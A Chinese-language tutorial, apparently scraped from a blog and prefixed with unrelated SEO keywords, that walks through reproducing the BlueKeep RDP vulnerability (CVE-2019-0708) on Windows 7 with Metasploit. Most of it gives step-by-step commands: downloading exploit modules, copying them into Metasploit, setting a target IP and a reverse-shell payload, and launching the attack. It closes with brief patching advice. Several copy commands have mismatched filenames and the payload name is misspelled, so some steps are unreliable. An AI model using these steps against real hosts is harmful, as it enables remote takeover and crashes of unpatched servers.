成功的营销网站,二次开发有没有前途,wordpress做的论坛,建设公司网站 优帮云漏洞背景:Windows 系列服务器于 2019 年 5 月 15 号#xff0c;被爆出高危漏洞#xff0c;该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞#xff0c;跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右#xff…漏洞背景:Windows 系列服务器于 2019 年 5 月 15 号被爆出高危漏洞该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右metaspolit 官方更新了漏洞利用程序。漏洞危害:CVE-2019-0708 漏洞是通过检查用户的身份认证导致可以绕过认证不用任何的交互直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用会导致服务器被黑客入侵、感染病毒像WannaCry永恒之蓝一样大规模的感染。漏洞影响范围:该漏洞影响范围较广Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。漏洞复现环境准备CVE 2019-0708的exploit地址https://github.com/rapid7/metasploit-framework/pull/12283?fromtimelineisappinstalled0ruby脚本地址https://github.com/rapid7/metasploit-framework/pull/12283/fileswget下载wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb复制到KALl MSF中rdp.rbcp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep.rbcp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp_scanner.rbcp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/cve_2019_0708_bluekeep_rce.rbcp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ 开始复现攻击命令使用msfconsole进入后使用reload_all重新加载模块使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce使用info查看工具相关信息以及设置set RHOSTS 设置IPset RPORT 设置RDP端口号使用set target ID设置受害机机器使用payload设置攻击载荷使用exploit开始攻击,等待建立连接Step1.打开kali下载4个模块Step2. 复制到MSF文件中如果出现无法找到rdp目录用mkdir创建一个目录运行文章上的4个复制命令到msf文件夹中。Step3.运行msfconsole重新加载模块use连接模块输入”msfconsole”启动msf然后输入” reload_all”重新加载模块进入msf后输入search 0708 搜索攻击模块。(小技巧直接use 编号 就能连接)连接编号为3的攻击模块cve_2019_0708_bluekeep_rce命令use exploit/windows/rdp/cve_2019_0708_bluekeep_rce当连接攻击模块后查看攻击设置命令 show optionsRHOSTS目标RPORT端口Target: 目标版本对应的id提示Target 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)Target2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)Target3Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)Target4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)设置目标ipset RHOSTS 192.168.1.192(测试机器ip 目标为win7)设置攻击版本 set target 3 (目标机器在vm上测试的)重要一点set payload windows/x64/shell_bitcp设置攻击载荷(不设置情况可能攻击失败)设置好目标ip以及targer运行exploit 开始攻击经过测试发现会导致大部分机器蓝屏因为发布的exp为阉割版所以大家请谨慎测试。修复方案1、最简便的方法就是安装一个安全管家比如火绒、360之类的2、把系统的自动更新打开或者到微软官网下载补丁3、设置防火墙规则并关闭3389端口